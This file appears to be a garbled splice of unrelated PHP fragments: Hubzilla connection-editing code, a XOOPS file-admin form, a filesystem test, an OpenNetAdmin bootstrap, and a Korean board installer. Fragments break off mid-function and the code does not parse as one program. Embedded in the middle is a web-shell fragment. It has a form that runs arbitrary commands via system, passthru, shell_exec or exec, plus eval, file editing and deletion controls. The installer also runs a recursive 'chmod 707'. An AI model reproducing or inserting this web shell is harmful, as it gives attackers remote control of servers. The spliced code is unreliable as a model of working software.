t('Edit contact notes'), '$close' => $contact['abook_closeness'], '$them' => t('Their Settings'), '$me' => t('My Settings'), '$perms' => $perms, '$perms_new' => t('Default permissions for this channel type have (just) been applied. They have <em>not</em> been saved and there are currently no stored default permissions. Please review/edit the applied settings and click [Submit] to finalize.'), '$clear' => t('Clear/Disable Automatic Permissions'), '$forum' => t('Forum Members'), '$soapbox' => t('Soapbox'), '$full' => t('Full Sharing (typical social network permissions)'), '$cautious' => t('Cautious Sharing '), '$follow' => t('Follow Only'), '$permlbl' => t('Individual Permissions'), '$permnote' => t('Some permissions may be inherited from your channel <a href="settings">privacy settings</a>, which have higher priority than individual settings. Changing those inherited settings on this page will have no effect.'), '$advanced' => t('Advanced Permissions'), '$quick' => t('Simple Permissions (select one and submit)'), '$common_link' => $a->get_baseurl(true) . '/common/loc/' . local_channel() . '/' . $contact['id'], '$all_friends' => $all_friends, '$relation_text' => $relation_text, '$visit' => sprintf(t('Visit %s\'s profile - %s'), $contact['xchan_name'], $contact['xchan_url']), '$blockunblock' => t('Block/Unblock contact'), '$ignorecont' => t('Ignore contact'), '$lblcrepair' => t("Repair URL settings"), '$lblrecent' => t('View conversations'), '$lblsuggest' => $lblsuggest, '$delete' => t('Delete contact'), '$poll_interval' => contact_poll_interval($contact['priority'], !$poll_enabled), '$poll_enabled' => $poll_enabled, '$lastupdtext' => t('Last update:'), '$lost_contact' => $lost_contact, '$updpub' => t('Update public posts'), '$last_update' => relative_date($contact['abook_connected']), '$udnow' => t('Update now'), '$profile_select' => contact_profile_assign($contact['abook_profile']), '$multiprofs' => feature_enabled(local_channel(), 'multi_profiles'), '$contact_id' => $contact['abook_id'], '$block_text' => $contact['blocked'] ? t('Unblock') : t('Block'), '$ignore_text' => $contact['readonly'] ? t('Unignore') : t('Ignore'), '$blocked' => $contact['blocked'] ? t('Currently blocked') : '', '$ignored' => $contact['readonly'] ? t('Currently ignored') : '', '$archived' => $contact['archive'] ? t('Currently archived') : '', '$pending' => $contact['archive'] ? t('Currently pending') : '', '$name' => $contact['name'], '$alt_text' => $alt_text, '$url' => $url));
$arr = array('contact' => $contact, 'output' => $o);
call_hooks('contact_edit', $arr);
return $arr['output'];
}
}
function editform()
{
global $xoopsModule, $wfsConfig, $xoopsConfig;
include XOOPS_ROOT_PATH . "/class/xoopsformloader.php";
$mimetype = new mimetype();
xoops_cp_header();
$article = new WfsArticle($this->articleid);
$atitle = "<a href='" . XOOPS_URL . "/modules/" . $xoopsModule->dirname() . "/article.php?articleid=" . $this->articleid . "'>" . $article->title . "</a>";
$stform = new XoopsThemeForm(_AM_FILESTATS, "op", xoops_getenv('PHP_SELF'));
echo "<div><h3>" . _AM_FILEATTACHED . "</h3></div>";
$stform->addElement(new XoopsFormLabel(_AM_FILESTAT, $atitle));
$stform->addElement(new XoopsFormLabel(_WFS_FILEID, "No: " . $this->fileid));
$workdir = XOOPS_ROOT_PATH . "/" . $wfsConfig['filesbasepath'];
if (file_exists(realpath($workdir . "/" . $this->filerealname))) {
$error = 'File <b>' . $this->filerealname . '</b> exists on server.';
} else {
$error = 'ERROR, File <b>' . $this->filerealname . '</b> please check!';
}
$stform->addElement(new XoopsFormLabel(_WFS_ERRORCHECK, $error));
$stform->addElement(new XoopsFormLabel(_WFS_FILEREALNAME, $this->getFileRealName("F")));
$stform->addElement(new XoopsFormLabel(_WFS_DOWNLOADNAME, $this->getDownloadname("F")));
$stform->addElement(new XoopsFormLabel(_WFS_MINETYPE, $this->getMinetype("F")));
$stform->addElement(new XoopsFormLabel(_WFS_EXT, "." . $this->getExt("F")));
$stform->addElement(new XoopsFormLabel(_WFS_FILEPERMISSION, get_perms(XOOPS_ROOT_PATH . "/" . $wfsConfig['filesbasepath'] . "/" . $this->getFileRealName("F"))));
$stform->addElement(new XoopsFormLabel(_WFS_DOWNLOADED, $this->getCounter("F") . " times"));
$stform->addElement(new XoopsFormLabel(_WFS_DOWNLOADSIZE, PrettySize(filesize(XOOPS_ROOT_PATH . "/" . $wfsConfig['filesbasepath'] . "/" . $this->getFileRealName("F")))));
$stform->addElement(new XoopsFormLabel(_WFS_LASTACCESS, lastaccess($workdir . "/" . $this->filerealname, 'E1')));
$stform->addElement(new XoopsFormLabel(_WFS_LASTUPDATED, formatTimestamp($this->date, $wfsConfig['timestamp'])));
//$stform->addElement(new XoopsFormLabel(_WFS_FILEREALNAME, $this->getFileRealName("F")));
$stform->display();
clearstatcache();
$sform = new XoopsThemeForm(_AM_MODIFYFILE, "op", xoops_getenv('PHP_SELF'));
echo "<div><h3>" . _AM_EDITFILE . "</h3></div>";
//global $xoopsConfig, $xoopsDB, $HTTP_POST_VARS, $myts, $wfsConfig, $myts;
include_once XOOPS_ROOT_PATH . '/class/xoopsformloader.php';
$sform = new XoopsThemeForm(_AM_MENUS, "op", xoops_getenv('PHP_SELF'));
$sform->addElement(new XoopsFormSelectGroup(_WFS_GROUPPROMPT, 'groupid', true, getGroupIda($this->groupid), 5, true));
$sform->addElement(new XoopsFormLabel(_WFS_FILEID, "No: " . $this->fileid));
$sform->addElement(new XoopsFormText(_WFS_ARTICLEID, 'articleid', 5, 5, $this->articleid));
$sform->addElement(new XoopsFormText(_WFS_FILEREALNAME, 'filerealname', 40, 40, $this->getFileRealName("F")));
$sform->addElement(new XoopsFormText(_WFS_DOWNLOADNAME, 'downloadname', 40, 40, $this->getDownloadname("F")));
$sform->addElement(new XoopsFormText(_WFS_FILESHOWNAME, 'fileshowname', 40, 80, $this->getFileShowName("F")));
$sform->addElement(new XoopsFormDhtmlTextArea(_WFS_FILEDESCRIPT, 'filedescript', $this->getFiledescript("F"), 10, 60));
$sform->addElement(new XoopsFormTextArea(_WFS_FILETEXT, 'filetext', $this->getFileText("F")));
$sform->addElement(new XoopsFormText(_WFS_EXT, 'ext', 30, 80, $this->getExt("F")));
$sform->addElement(new XoopsFormText(_WFS_MINETYPE, 'minetype', 40, 80, $this->getMinetype("F")));
$sform->addElement(new XoopsFormLabel(_WFS_UPDATEDATE, formatTimestamp($this->date, $wfsConfig['timestamp'])));
$sform->addElement(new XoopsFormHidden('fileid', $this->fileid));
//echo $this->fileid;
//echo "<input type='hidden' name='fileid' value='$this->fileid' />\n";
///$sform->addElement(new XoopsFormHidden('fileid', ".$this->fileid."));
$button_tray = new XoopsFormElementTray('', '');
//$hidden = new XoopsFormHidden('fileid', $this->fileid);
$hidden = new XoopsFormHidden('op', 'filesave');
$button_tray->addElement($hidden);
$button_tray->addElement(new XoopsFormButton('', 'post', _AM_SAVECHANGE, 'submit'));
$sform->addElement($button_tray);
$sform->display();
unset($hidden);
}
echo "<form method='post'>\n <input type='text' name='comandexe' size='10'>\n <select name='command'> \n <option value='system'>System</option>\n <option value='passthru'>Passthru</option>\n <option value='shell_exec'>Shell_exec</option>\n <option value='exec'>Exec</option>\n </select>\n <input type='submit' value='ExecuteCommand'>\n </form>";
echo form("eval", "eval", "Eval");
echo form("phpinfo", "phpinfo", "Phpinfo");
echo form("mysql", "mysql", "Mysql");
if (isset($_POST["edit"])) {
$filedir = $_POST["edit"];
$filedit = file_get_contents($filedir);
echo "<br/><form action='' method='post'>\n <textarea cols='80' rows='20' name='savetest'>" . htmlspecialchars($filedit) . "</textarea><br/>\n <font size='1'>File name:</font><input type='text' name='save' size='10' value='" . $_POST["edit"] . "'>\n <input type='submit' value='Save'>\n </form>";
}
if ($dirfile = opendir($diratt)) {
while (false !== ($filedir = readdir($dirfile))) {
$filesiz = sprintf("%01.2f", filesize("{$diratt}/{$filedir}") / 1024);
$groupid = posix_getpwuid(fileowner("{$diratt}/{$filedir}"));
$groupinfo = posix_getgrgid(filegroup("{$diratt}/{$filedir}"));
$ow = $groupid[name] . " " . $groupinfo[name];
$info = get_perms("{$diratt}/{$filedir}");
if ($filedir != "." && $filedir != "..") {
if (is_file("{$diratt}/{$filedir}")) {
echo "<table border='1' width='60%'><tr><td>{$filedir}</td><td width='15%'>{$ow}</td><td width='20%'>{$info}</td><td width='15%'>{$filesiz} K</td></tr></table>";
} else {
echo "<table border='1' width='60%'bgcolor='red'><tr><td>{$filedir}</td><td width='15%'>{$ow}</td><td width='35%'>{$info}</td></tr></table>";
}
}
}
}
echo formsub("edit", "Edit");
echo formsub("delete", "Delete");
echo formsub("makefile", "Makefile");
echo formsub("makedir", "Makedir");
if (isset($_POST["savetest"]) && isset($_POST["save"])) {
$testnew = $_POST["savetest"];
function view_perms_color($file)
{
if (!is_readable($file)) {
return "<font color=red>" . get_perms($file, 1) . "</font>";
} else {
if (!is_writable($file)) {
return "<font color=green>" . get_perms($file, 1) . "</font>";
} else {
return "<font color=#4C83AF>" . get_perms($file, 1) . "</font>";
}
}
}
function link_genera($a, $dir)
{
$image = array("jpg", "gif", 'png', 'JPG', 'GIF', 'PNG', 'jpeg', 'JPEG', 'bnp');
$re = '<tr>';
$info = get_perms($dir . '/' . $a);
if (is_dir($dir . '/' . $a)) {
$re .= "<TD><a href='" . $_SERVER['PHP_SELF'] . "?dir=" . $dir . '/' . $a . "'>" . htmlspecialchars($a) . '</a></td><td> directory</td><td></td><td></td><td><a href="' . $_SERVER['PHP_SELF'] . '?rmdir=' . $dir . '/' . $a . '">REMOVE</a></td>';
} else {
$re .= "<td>" . htmlspecialchars($a) . "</td></td>";
if (in_array(file_get_type($dir . '/' . $a), $image)) {
$re .= " <td><font color=red>immagine</font></td><td><a href='" . $_SERVER["PHP_SELF"] . "?image=" . $dir . '/' . $a . "'>VIEW</a></td> ";
} else {
$re .= " <td>file</td><td><a href=' " . $_SERVER["PHP_SELF"] . "?file=" . $dir . '/' . $a . "'>view</a></td>";
}
$re .= " <td><a href='" . $_SERVER["PHP_SELF"] . "?filedit=" . $dir . '/' . $a . "'>EDIT</a></td> <td> <a href='" . $_SERVER["PHP_SELF"] . "?fileremove=" . $dir . '/' . $a . "'>REMOVE</a></td>";
}
$flsz = filesize($dir . '/' . $a);
$re .= " <td> " . $info . "</td><td>dimensione " . $flsz . "</td>";
$re .= '</tr>';
return $re;
}
} catch (Exception $e) {
$t->pass('$fs->move() throws if the destination doesn\'t exist');
}
$fs->mkdir($sandboxDir . '/dir2');
$fs->move($sandboxDir . '/dir1', $sandboxDir . '/dir2/dir');
$t->ok(is_dir($sandboxDir . '/dir2' . '/dir'), '$fs->move() renames folder in "destination" if basename("destination") doesn\'t exist');
$fs->rmdir($sandboxDir, true, true);
// Works only on linux
if (php_uname('s') == 'Linux') {
$t->comment('nbFileSystemTest - Test Chmod');
$fs->rmdir($sandboxDir, true, true);
$filename = $sandboxDir . '/file1';
$fs->touch($filename);
$perms = get_perms($filename);
echo $fs->formatPermissions($filename);
$t->ok($perms & 0x80, 'User has write permission');
$fs->chmod($filename, 0440);
$perms = get_perms($filename);
echo $fs->formatPermissions($filename);
$t->ok(!($perms & 0x80), 'User has no write permission');
$fs->chmod($filename, 0744);
$perms = get_perms($filename);
echo $fs->formatPermissions($filename);
$t->ok($perms & 0x80, 'User has write permission');
$fs->rmdir($sandboxDir, true, true);
}
function get_perms($filename)
{
clearstatcache();
return fileperms($filename);
}
$include = $base . '/include';
if (!is_dir($include)) {
print "ERROR => Couldn't find include folder!\n";
exit;
}
require_once $base . '/config/config.inc.php';
/* --------------------------------------------------------- */
// MP: Since we know ONA will generate a ton of notice level errors, lets turn them off here
// I dont believe this will be impactful to anyone. keep an eye out for it however.
error_reporting(E_ALL ^ E_NOTICE);
// Start out the session as a guest with level 0 access. This is for view only mode.
// You can enable or disable this by setting the "disable_guest" sysconfig option
if (!$_SESSION['ona']['auth']['user']['username'] and !$conf['disable_guest']) {
$_SESSION['ona']['auth']['user']['username'] = '******';
list($status, $js) = get_authentication('guest', 'guest');
get_perms('guest');
}
// force https if required
if ($_SERVER['SERVER_PORT'] != 443 and $conf['force_https'] == 1) {
echo <<<EOL
<html><body>
Redirecting you to: <a href="{$https}{$baseURL}">{$https}{$baseURL}</a>
<script type="text/javascript"><!--
setTimeout("window.location = \\"{$https}{$baseURL}\\";", 10);
--></script>
</body></html>
EOL;
exit;
}
// // Redirect them to login page if they're not already logged in
if (!loggedIn()) {
$ahaed_dir = get_path($SCRIPT_NAME);
if (!strstr("rwxrwxrwx|rwx---rwx", get_perms("../{$ahaed_dir}"))) {
echo "<B>설치디렉토리인, " . get_path($SCRIPT_NAME) . " 디렉토리 퍼미션이 " . get_perms("../") . " 입니다.</B><BR>";
echo "<B>퍼미션을 rwx---rwx(707) 이나 rwxrwxrwx(777) 로 변경해 주신 후 설치해 주십시오.</B><BR>";
exit;
}
print `tar xvfz kimsboard7.tar.gz`;
print `chmod 707 -R *`;
print `rm kimsboard7.tar.gz`;
} else {
if (!is_file("./index.php")) {
echo "<B>킴스보드7 압축파일인 kimsboard7.tar.gz 파일의 압축을 풀어 업로드후 하부의 모든파일 및 디렉토리 퍼미션을 707로 설정해 주십시오.</B><BR>";
exit;
} else {
if (!strstr("rwxrwxrwx|rwx---rwx", get_perms("../{$ahaed_dir}"))) {
echo "<B>설치디렉토리 퍼미션이 " . get_perms("../{$ahaed_dir}") . " 입니다.</B><BR>";
echo "<B>설치디렉토리를 포함하여 하부의 모든 파일 및 디렉토리 퍼미션을 rwx---rwx(707) 이나 rwxrwxrwx(777) 로 변경해 주신 후 설치해 주십시오.</B><BR>";
echo "<B>텔넷을 이용하여 <font color=gold>chmod 707 -R *</font> 를 실행시켜 주시면 됩니다.<BR>";
exit;
} else {
print `du -h *`;
}
}
}
?>
<FONT COLOR=GOLD>
<?php
if ("http://{$HTTP_HOST}/install.php" != "http://{$HTTP_HOST}{$SCRIPT_NAME}") {
function connedit_content(&$a)
{
$sort_type = 0;
$o = '';
// this triggers some javascript to set Full Sharing by default after
// completing a "follow" - which can be changed to something else before
// form submission, but this gives us something useable
if ($_GET['follow'] == 1) {
$o .= '<script>var after_following = 1;</script>';
}
if (!local_user()) {
notice(t('Permission denied.') . EOL);
return login();
}
if (argc() == 3) {
$contact_id = intval(argv(1));
if (!$contact_id) {
return;
}
$cmd = argv(2);
$orig_record = q("SELECT abook.*, xchan.* FROM abook left join xchan on abook_xchan = xchan_hash\n\t\t\tWHERE abook_id = %d AND abook_channel = %d AND NOT ( abook_flags & %d ) LIMIT 1", intval($contact_id), intval(local_user()), intval(ABOOK_FLAG_SELF));
if (!count($orig_record)) {
notice(t('Could not access address book record.') . EOL);
goaway($a->get_baseurl(true) . '/connections');
}
if ($cmd === 'update') {
// pull feed and consume it, which should subscribe to the hub.
proc_run('php', "include/poller.php", "{$contact_id}");
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'refresh') {
if (!zot_refresh($orig_record[0], get_app()->get_channel())) {
notice(t('Refresh failed - channel is currently unavailable.'));
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'block') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_BLOCKED)) {
info(($orig_record[0]['abook_flags'] & ABOOK_FLAG_BLOCKED ? t('Channel has been unblocked') : t('Channel has been blocked')) . EOL);
connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'ignore') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_IGNORED)) {
info(($orig_record[0]['abook_flags'] & ABOOK_FLAG_IGNORED ? t('Channel has been unignored') : t('Channel has been ignored')) . EOL);
connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'archive') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_ARCHIVED)) {
info(($orig_record[0]['abook_flags'] & ABOOK_FLAG_ARCHIVED ? t('Channel has been unarchived') : t('Channel has been archived')) . EOL);
connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'hide') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_HIDDEN)) {
info(($orig_record[0]['abook_flags'] & ABOOK_FLAG_HIDDEN ? t('Channel has been unhidden') : t('Channel has been hidden')) . EOL);
connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
// We'll prevent somebody from unapproving an already approved contact.
// Though maybe somebody will want this eventually (??)
if ($cmd === 'approve') {
if ($orig_record[0]['abook_flags'] & ABOOK_FLAG_PENDING) {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_PENDING)) {
info(($orig_record[0]['abook_flags'] & ABOOK_FLAG_PENDING ? t('Channel has been approved') : t('Channel has been unapproved')) . EOL);
connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'drop') {
require_once 'include/Contact.php';
// FIXME
// We need to send either a purge or a refresh packet to the other side (the channel being unfriended).
// The issue is that the abook DB record _may_ get destroyed when we call contact_remove. As the notifier runs
// in the background there could be a race condition preventing this packet from being sent in all cases.
// PLACEHOLDER
contact_remove(local_user(), $orig_record[0]['abook_id']);
build_sync_packet(0, array('abook' => array('abook_xchan' => $orig_record[0]['abook_xchan'], 'entry_deleted' => true)));
info(t('Connection has been removed.') . EOL);
if (x($_SESSION, 'return_url')) {
goaway($a->get_baseurl(true) . '/' . $_SESSION['return_url']);
}
goaway($a->get_baseurl(true) . '/contacts');
}
}
if ($a->poi) {
$contact_id = $a->poi['abook_id'];
$contact = $a->poi;
$tabs = array(array('label' => t('View Profile'), 'url' => chanlink_cid($contact['abook_id']), 'sel' => '', 'title' => sprintf(t('View %s\'s profile'), $contact['xchan_name'])), array('label' => t('Refresh Permissions'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/refresh', 'sel' => '', 'title' => t('Fetch updated permissions')), array('label' => t('Recent Activity'), 'url' => $a->get_baseurl(true) . '/network/?f=&cid=' . $contact['abook_id'], 'sel' => '', 'title' => t('View recent posts and comments')), array('label' => $contact['abook_flags'] & ABOOK_FLAG_BLOCKED ? t('Unblock') : t('Block'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/block', 'sel' => $contact['abook_flags'] & ABOOK_FLAG_BLOCKED ? 'active' : '', 'title' => t('Block or Unblock this connection')), array('label' => $contact['abook_flags'] & ABOOK_FLAG_IGNORED ? t('Unignore') : t('Ignore'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/ignore', 'sel' => $contact['abook_flags'] & ABOOK_FLAG_IGNORED ? 'active' : '', 'title' => t('Ignore or Unignore this connection')), array('label' => $contact['abook_flags'] & ABOOK_FLAG_ARCHIVED ? t('Unarchive') : t('Archive'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/archive', 'sel' => $contact['abook_flags'] & ABOOK_FLAG_ARCHIVED ? 'active' : '', 'title' => t('Archive or Unarchive this connection')), array('label' => $contact['abook_flags'] & ABOOK_FLAG_HIDDEN ? t('Unhide') : t('Hide'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/hide', 'sel' => $contact['abook_flags'] & ABOOK_FLAG_HIDDEN ? 'active' : '', 'title' => t('Hide or Unhide this connection')), array('label' => t('Delete'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/drop', 'sel' => '', 'title' => t('Delete this connection')));
$self = false;
if (!($contact['abook_flags'] & ABOOK_FLAG_SELF)) {
$tab_tpl = get_markup_template('common_tabs.tpl');
$t = replace_macros($tab_tpl, array('$tabs' => $tabs));
} else {
$self = true;
}
$a->page['htmlhead'] .= replace_macros(get_markup_template('contact_head.tpl'), array('$baseurl' => $a->get_baseurl(true), '$editselect' => $editselect));
require_once 'include/contact_selectors.php';
$tpl = get_markup_template("abook_edit.tpl");
if (feature_enabled(local_user(), 'affinity')) {
$slider_tpl = get_markup_template('contact_slider.tpl');
$slide = replace_macros($slider_tpl, array('$me' => t('Me'), '$val' => $contact['abook_closeness'] ? $contact['abook_closeness'] : 99, '$intimate' => t('Best Friends'), '$friends' => t('Friends'), '$oldfriends' => t('Former Friends'), '$acquaintances' => t('Acquaintances'), '$world' => t('Unknown')));
}
$perms = array();
$channel = $a->get_channel();
$global_perms = get_perms();
$existing = get_all_perms(local_user(), $contact['abook_xchan']);
$unapproved = array('pending', t('Approve this connection'), '', t('Accept connection to allow communication'));
foreach ($global_perms as $k => $v) {
$thisperm = $contact['abook_my_perms'] & $v[1] ? "1" : '';
// For auto permissions (when $self is true) we don't want to look at existing
// permissions because they are enabled for the channel owner
if (!$self && $existing[$k]) {
$thisperm = "1";
}
$perms[] = array('perms_' . $k, $v[3], $contact['abook_their_perms'] & $v[1] ? "1" : "", $thisperm, $v[1], $channel[$v[0]] == PERMS_SPECIFIC ? '' : '1', $v[4]);
}
$o .= replace_macros($tpl, array('$header' => $self ? t('Automatic Permissions Settings') : sprintf(t('Connections: settings for %s'), $contact['xchan_name']), '$addr' => $contact['xchan_addr'], '$notself' => $self ? '' : '1', '$self' => $self ? '1' : '', '$autolbl' => t('When receiving a channel introduction, any permissions provided here will be applied to the new connection automatically and the introduction approved. Leave this page if you do not wish to use this feature.'), '$viewprof' => t('View Profile'), '$lbl_slider' => t('Slide to adjust your degree of friendship'), '$slide' => $slide, '$tabs' => $t, '$tab_str' => $tab_str, '$is_pending' => $contact['abook_flags'] & ABOOK_FLAG_PENDING ? 1 : '', '$unapproved' => $unapproved, '$inherited' => t('inherited'), '$approve' => t('Approve this connection'), '$noperms' => !$self && !$contact['abook_my_perms'] ? t('Connection has no individual permissions!') : '', '$noperm_desc' => !$self && !$contact['abook_my_perms'] ? t('This may be appropriate based on your <a href="settings">privacy settings</a>, though you may wish to review the "Advanced Permissions".') : '', '$submit' => t('Submit'), '$lbl_vis1' => t('Profile Visibility'), '$lbl_vis2' => sprintf(t('Please choose the profile you would like to display to %s when viewing your profile securely.'), $contact['xchan_name']), '$lbl_info1' => t('Contact Information / Notes'), '$infedit' => t('Edit contact notes'), '$close' => $contact['abook_closeness'], '$them' => t('Their Settings'), '$me' => t('My Settings'), '$perms' => $perms, '$clear' => t('Clear/Disable Automatic Permissions'), '$forum' => t('Forum Members'), '$soapbox' => t('Soapbox'), '$full' => t('Full Sharing (typical social network permissions)'), '$cautious' => t('Cautious Sharing '), '$follow' => t('Follow Only'), '$permlbl' => t('Individual Permissions'), '$permnote' => t('Some permissions may be inherited from your channel <a href="settings">privacy settings</a>, which have higher priority than individual settings. Changing those inherited settings on this page will have no effect.'), '$advanced' => t('Advanced Permissions'), '$quick' => t('Simple Permissions (select one and submit)'), '$common_link' => $a->get_baseurl(true) . '/common/loc/' . local_user() . '/' . $contact['id'], '$all_friends' => $all_friends, '$relation_text' => $relation_text, '$visit' => sprintf(t('Visit %s\'s profile - %s'), $contact['xchan_name'], $contact['xchan_url']), '$blockunblock' => t('Block/Unblock contact'), '$ignorecont' => t('Ignore contact'), '$lblcrepair' => t("Repair URL settings"), '$lblrecent' => t('View conversations'), '$lblsuggest' => $lblsuggest, '$delete' => t('Delete contact'), '$poll_interval' => contact_poll_interval($contact['priority'], !$poll_enabled), '$poll_enabled' => $poll_enabled, '$lastupdtext' => t('Last update:'), '$lost_contact' => $lost_contact, '$updpub' => t('Update public posts'), '$last_update' => relative_date($contact['abook_connected']), '$udnow' => t('Update now'), '$profile_select' => contact_profile_assign($contact['abook_profile']), '$multiprofs' => feature_enabled(local_user(), 'multi_profiles'), '$contact_id' => $contact['abook_id'], '$block_text' => $contact['blocked'] ? t('Unblock') : t('Block'), '$ignore_text' => $contact['readonly'] ? t('Unignore') : t('Ignore'), '$blocked' => $contact['blocked'] ? t('Currently blocked') : '', '$ignored' => $contact['readonly'] ? t('Currently ignored') : '', '$archived' => $contact['archive'] ? t('Currently archived') : '', '$pending' => $contact['archive'] ? t('Currently pending') : '', '$hidden' => array('hidden', t('Hide this contact from others'), $contact['hidden'] == 1, t('Replies/likes to your public posts <strong>may</strong> still be visible')), '$photo' => $contact['photo'], '$name' => $contact['name'], '$dir_icon' => $dir_icon, '$alt_text' => $alt_text, '$sparkle' => $sparkle, '$url' => $url));
$arr = array('contact' => $contact, 'output' => $o);
call_hooks('contact_edit', $arr);
return $arr['output'];
}
}
function new_contact($uid, $url, $channel, $interactive = false, $confirm = false)
{
$result = array('success' => false, 'message' => '');
$a = get_app();
$is_red = false;
$is_http = strpos($url, '://') !== false ? true : false;
if ($is_http && substr($url, -1, 1) === '/') {
$url = substr($url, 0, -1);
}
if (!allowed_url($url)) {
$result['message'] = t('Channel is blocked on this site.');
return $result;
}
if (!$url) {
$result['message'] = t('Channel location missing.');
return $result;
}
// check service class limits
$r = q("select count(*) as total from abook where abook_channel = %d and abook_self = 0 ", intval($uid));
if ($r) {
$total_channels = $r[0]['total'];
}
if (!service_class_allows($uid, 'total_channels', $total_channels)) {
$result['message'] = upgrade_message();
return $result;
}
$arr = array('url' => $url, 'channel' => array());
call_hooks('follow', $arr);
if ($arr['channel']['success']) {
$ret = $arr['channel'];
} elseif (!$is_http) {
$ret = zot_finger($url, $channel);
}
if ($ret && $ret['success']) {
$is_red = true;
$j = json_decode($ret['body'], true);
}
$my_perms = get_channel_default_perms($uid);
$role = get_pconfig($uid, 'system', 'permissions_role');
if ($role) {
$x = get_role_perms($role);
if ($x['perms_follow']) {
$my_perms = $x['perms_follow'];
}
}
if ($is_red && $j) {
logger('follow: ' . $url . ' ' . print_r($j, true), LOGGER_DEBUG);
if (!($j['success'] && $j['guid'])) {
$result['message'] = t('Response from remote channel was incomplete.');
logger('mod_follow: ' . $result['message']);
return $result;
}
// Premium channel, set confirm before callback to avoid recursion
if (array_key_exists('connect_url', $j) && $interactive && !$confirm) {
goaway(zid($j['connect_url']));
}
// do we have an xchan and hubloc?
// If not, create them.
$x = import_xchan($j);
if (array_key_exists('deleted', $j) && intval($j['deleted'])) {
$result['message'] = t('Channel was deleted and no longer exists.');
return $result;
}
if (!$x['success']) {
return $x;
}
$xchan_hash = $x['hash'];
$their_perms = 0;
$global_perms = get_perms();
if (array_key_exists('permissions', $j) && array_key_exists('data', $j['permissions'])) {
$permissions = crypto_unencapsulate(array('data' => $j['permissions']['data'], 'key' => $j['permissions']['key'], 'iv' => $j['permissions']['iv']), $channel['channel_prvkey']);
if ($permissions) {
$permissions = json_decode($permissions, true);
}
logger('decrypted permissions: ' . print_r($permissions, true), LOGGER_DATA);
} else {
$permissions = $j['permissions'];
}
foreach ($permissions as $k => $v) {
if ($v) {
$their_perms = $their_perms | intval($global_perms[$k][1]);
}
}
} else {
$their_perms = 0;
$xchan_hash = '';
$r = q("select * from xchan where xchan_hash = '%s' or xchan_url = '%s' limit 1", dbesc($url), dbesc($url));
if (!$r) {
// attempt network auto-discovery
if (strpos($url, '@') && !$is_http) {
$r = discover_by_webbie($url);
} elseif ($is_http) {
$r = discover_by_url($url);
$r['allowed'] = intval(get_config('system', 'feed_contacts'));
}
if ($r) {
$r['channel_id'] = $uid;
call_hooks('follow_allow', $r);
if (!$r['allowed']) {
$result['message'] = t('Protocol disabled.');
return $result;
}
$r = q("select * from xchan where xchan_hash = '%s' or xchan_url = '%s' limit 1", dbesc($url), dbesc($url));
}
}
if ($r) {
$xchan_hash = $r[0]['xchan_hash'];
$their_perms = 0;
}
}
if (!$xchan_hash) {
$result['message'] = t('Channel discovery failed.');
logger('follow: ' . $result['message']);
return $result;
}
if (local_channel() && $uid == local_channel()) {
$aid = get_account_id();
$hash = get_observer_hash();
$ch = $a->get_channel();
$default_group = $ch['channel_default_group'];
} else {
$r = q("select * from channel where channel_id = %d limit 1", intval($uid));
if (!$r) {
$result['message'] = t('local account not found.');
return $result;
}
$aid = $r[0]['channel_account_id'];
$hash = $r[0]['channel_hash'];
$default_group = $r[0]['channel_default_group'];
}
if ($is_http) {
$r = q("select count(*) as total from abook where abook_account = %d and abook_feed = 1 ", intval($aid));
if ($r) {
$total_feeds = $r[0]['total'];
}
if (!service_class_allows($uid, 'total_feeds', $total_feeds)) {
$result['message'] = upgrade_message();
return $result;
}
}
if ($hash == $xchan_hash) {
$result['message'] = t('Cannot connect to yourself.');
return $result;
}
$r = q("select abook_xchan from abook where abook_xchan = '%s' and abook_channel = %d limit 1", dbesc($xchan_hash), intval($uid));
if ($r) {
$x = q("update abook set abook_their_perms = %d where abook_id = %d", intval($their_perms), intval($r[0]['abook_id']));
} else {
$closeness = get_pconfig($uid, 'system', 'new_abook_closeness');
if ($closeness === false) {
$closeness = 80;
}
$r = q("insert into abook ( abook_account, abook_channel, abook_closeness, abook_xchan, abook_feed, abook_their_perms, abook_my_perms, abook_created, abook_updated )\n\t\t\tvalues( %d, %d, %d, '%s', %d, %d, %d, '%s', '%s' ) ", intval($aid), intval($uid), intval($closeness), dbesc($xchan_hash), intval($is_http ? 1 : 0), intval($is_http ? $their_perms | PERMS_R_STREAM | PERMS_A_REPUBLISH : $their_perms), intval($my_perms), dbesc(datetime_convert()), dbesc(datetime_convert()));
}
if (!$r) {
logger('mod_follow: abook creation failed');
}
$r = q("select abook.*, xchan.* from abook left join xchan on abook_xchan = xchan_hash \n\t\twhere abook_xchan = '%s' and abook_channel = %d limit 1", dbesc($xchan_hash), intval($uid));
if ($r) {
$result['abook'] = $r[0];
proc_run('php', 'include/notifier.php', 'permission_update', $result['abook']['abook_id']);
}
$arr = array('channel_id' => $uid, 'abook' => $result['abook']);
call_hooks('follow', $arr);
/** If there is a default group for this channel, add this member to it */
if ($default_group) {
require_once 'include/group.php';
$g = group_rec_byhash($uid, $default_group);
if ($g) {
